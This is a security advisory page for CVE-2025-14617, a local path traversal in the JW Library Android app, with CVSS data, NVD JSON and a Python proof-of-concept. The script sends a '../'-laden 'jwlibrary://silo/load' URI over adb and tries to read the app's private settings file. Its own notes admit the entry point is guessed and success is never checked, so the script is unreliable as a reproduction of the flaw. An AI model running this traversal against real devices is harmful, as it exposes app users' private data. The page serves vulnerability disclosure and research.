Security Vulnerability Report
CVE-2025-14617 CVSS 5.3 MEDIUM

CVE-2025-14617

Published: 2025-12-13 16:16:53
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in the Jehovahs Witnesses JW Library App up to version 15.5.1 on Android. An unknown function of the component org.jw.jwlibrary.mobile.activity.SiloContainer is affected. Manipulation of this function leads to path traversal. Local access is required to carry out this attack. The exploit has been publicly disclosed and may be used.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Jehovahs Witnesses JW Library App (Android) <= 15.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
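# CVE-2025-14617 Path Traversal PoC for JW Library App (Android)
# This PoC demonstrates the path traversal vulnerability in SiloContainer component
import os
import subprocess
import re


def check_vulnerable_version(
    package_name="org.jw.jwlibrary",
    *,
    max_vulnerable=(15, 5, 1),
    dumpsys_output=None,
):
    """Check if JW Library version is vulnerable (<= 15.5.1).

    The version is read from the ``versionName=`` field of
    ``adb shell dumpsys package <package_name>`` unless ``dumpsys_output``
    is supplied, in which case that text is parsed instead and no device
    is contacted (useful for tests and for offline analysis of a saved
    bug report).

    Args:
        package_name: Android package queried via dumpsys.
        max_vulnerable: Highest affected version as a tuple of ints; any
            newer version is reported as not vulnerable.
        dumpsys_output: Optional pre-captured dumpsys text.

    Returns:
        ``(True, version)`` when the parsed version is <= ``max_vulnerable``,
        ``(False, None)`` when it is newer, and ``(None, None)`` when the
        version could not be determined (adb missing or timed out, no
        ``versionName`` line in the output, or an unparsable version string).
        Unlike the original, a missing ``versionName`` line is reported as
        "unknown" rather than "not vulnerable", since it usually means the
        package is not installed rather than that it is patched.
    """
    try:
        if dumpsys_output is None:
            result = subprocess.run(
                ["adb", "shell", "dumpsys", "package", package_name],
                capture_output=True,
                text=True,
                timeout=10,
            )
            dumpsys_output = result.stdout
        version_match = re.search(r"versionName=([\d.]+)", dumpsys_output)
        if not version_match:
            return None, None
        version = version_match.group(1)
        # Tuple comparison handles any number of components and fixes the
        # original check, which treated every 15.5.x (including 15.5.2+) as
        # vulnerable and raised IndexError on two-part versions such as 15.5.
        version_parts = tuple(int(p) for p in version.split(".") if p)
        if not version_parts:
            return None, None
        if version_parts <= tuple(max_vulnerable):
            return True, version
        return False, None
    except (OSError, subprocess.SubprocessError, ValueError) as e:
        # OSError: adb not installed / not on PATH; SubprocessError: the
        # command timed out; ValueError: a non-numeric version component.
        print(f"Error checking version: {e}")
        return None, None


def exploit_path_traversal(target_file="/data/data/org.jw.jwlibrary/shared_prefs/settings.xml"):
    """
    Exploit path traversal vulnerability in SiloContainer component

    Attack vector: Construct malicious path with ../ sequences

    Strips the app's own data-directory prefix from ``target_file``,
    prepends ``../../../``, wraps the result in a ``jwlibrary://silo/load``
    URI that is sent to the device with ``am start``, and then attempts to
    read ``target_file`` with ``run-as``.

    NOTE(review): the ``jwlibrary://silo/load?path=`` URI is this script's
    own construction; the advisory names only the SiloContainer component
    and does not document the vulnerable entry point, so the intent may not
    be handled by the app at all. ``run-as`` is presumably only honoured
    for debuggable builds of the package -- confirm on the target build.

    Returns:
        ``False`` only if one of the adb invocations raised an exception;
        otherwise ``True``. The exit status and output of the adb commands
        are never inspected, so ``True`` does not mean the traversal
        succeeded.
    """
    # Malicious path construction
    traversal_path = "../../../" + target_file.replace("/data/data/org.jw.jwlibrary/", "")

    # Simulate the vulnerable function call
    vulnerable_endpoint = f"jwlibrary://silo/load?path={traversal_path}"

    print(f"[*] Target: {target_file}")
    print(f"[*] Malicious path: {traversal_path}")
    print(f"[*] Constructed URI: {vulnerable_endpoint}")

    # Attempt to trigger the vulnerable component via ADB
    try:
        # Method 1: Using am start with custom URI
        subprocess.run(
            ["adb", "shell", "am", "start", "-a", "android.intent.action.VIEW", "-d", vulnerable_endpoint],
            capture_output=True,
            timeout=5,
        )

        # Method 2: Direct file access attempt
        subprocess.run(
            ["adb", "shell", "run-as", "org.jw.jwlibrary", "cat", target_file],
            capture_output=True,
            timeout=5,
        )
    except Exception as e:
        print(f"[!] Exploitation failed: {e}")
        return False

    return True


def verify_vulnerability():
    """Main verification routine.

    Prints a banner, runs ``check_vulnerable_version`` and calls
    ``exploit_path_traversal`` only when the version check returned
    ``True``; ``False`` and ``None`` results are reported and nothing
    else is executed.
    """
    print("=" * 60)
    print("CVE-2025-14617 Path Traversal Verification")
    print("Target: Jehovahs Witnesses JW Library App (<= 15.5.1)")
    print("Component: org.jw.jwlibrary.mobile.activity.SiloContainer")
    print("=" * 60)

    is_vulnerable, version = check_vulnerable_version()

    if is_vulnerable is True:
        print(f"[+] Device is running vulnerable version: {version}")
        exploit_path_traversal()
    elif is_vulnerable is False:
        print("[-] Device is NOT vulnerable (version > 15.5.1)")
    else:
        print("[!] Unable to determine vulnerability status")


if __name__ == "__main__":
    verify_vulnerability()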

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14617", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:53.023", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Jehovahs Witnesses JW Library App up to 15.5.1 on Android. Affected is an unknown function of the component org.jw.jwlibrary.mobile.activity.SiloContainer. Such manipulation leads to path traversal. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336303", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336303", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.705077", "source": "[email protected]"}]}}